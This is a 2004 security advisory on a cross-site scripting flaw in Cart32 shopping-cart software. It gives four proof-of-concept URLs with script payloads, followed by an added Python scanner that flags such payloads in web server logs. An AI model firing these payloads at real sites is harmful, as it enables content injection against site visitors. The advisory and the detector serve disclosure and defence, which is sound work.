June 28, 2004 12:00 AM

Cross Site Scripting Vulnerability in McMurtrey/Whitaker & Associates' Cart32

Windows IT Pro
InstantDoc ID #43119

Reported June 28, 2004, by Dr Ponidi.

VERSIONS AFFECTED

  • McMurtrey/Whitaker & Associates' Cart32 5.0, 4.5, and 3.5a

DESCRIPTION
Cart32 contains a cross-site scripting vulnerability that could let a remote attacker inject third-party content into a Web site.

DEMONSTRATION
Any of the following URLs can be used to trigger the vulnerability:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

VENDOR RESPONSE
The vendor, McMurtrey/Whitaker & Associates, hasn't released a fix for this vulnerability.
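
With no vendor fix available, one way to spot requests against this endpoint is to scan web server access logs for markup in the cart32 parameter. The following is an added example, not part of the original advisory or the vendor's code; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint from the advisory; the directory (/scripts, /cgi-bin) is not pinned.
ENDPOINT = re.compile(r"/(cart32|c32web)\.exe/getlatestbuilds$", re.I)
# Characters that let a reflected value break out into markup.
HTML_META = re.compile(r"[<>\"']")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%253C -> %3C -> <), bounded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(url):
    """True if the URL targets GetLatestBuilds with markup in the cart32 parameter."""
    parts = urlsplit(url)
    if not ENDPOINT.search(fully_decode(parts.path)):
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "cart32" and HTML_META.search(fully_decode(value)):
            return True
    return False

def scan(lines):
    """Return the request targets of log lines that match."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jun/2004:10:00:01 +0000] "GET /scripts/cart32.exe/GetLatestBuilds?cart32=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.0" 200 512',
    '192.0.2.11 - - [28/Jun/2004:10:00:05 +0000] "GET /cgi-bin/C32WEB.EXE/getlatestbuilds?cart32=%253Cscript%253E HTTP/1.0" 200 498',
    '192.0.2.12 - - [28/Jun/2004:10:00:09 +0000] "GET /scripts/cart32.exe/GetLatestBuilds?cart32=demo HTTP/1.0" 200 301',
    '192.0.2.13 - - [28/Jun/2004:10:00:12 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for target in scan(SAMPLE_LOG):
        print("suspicious:", target)
```

The check decodes the parameter more than once so that double-encoded markup is still flagged, and it matches the executable name case-insensitively.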

CREDIT
Discovered by Dr Ponidi.
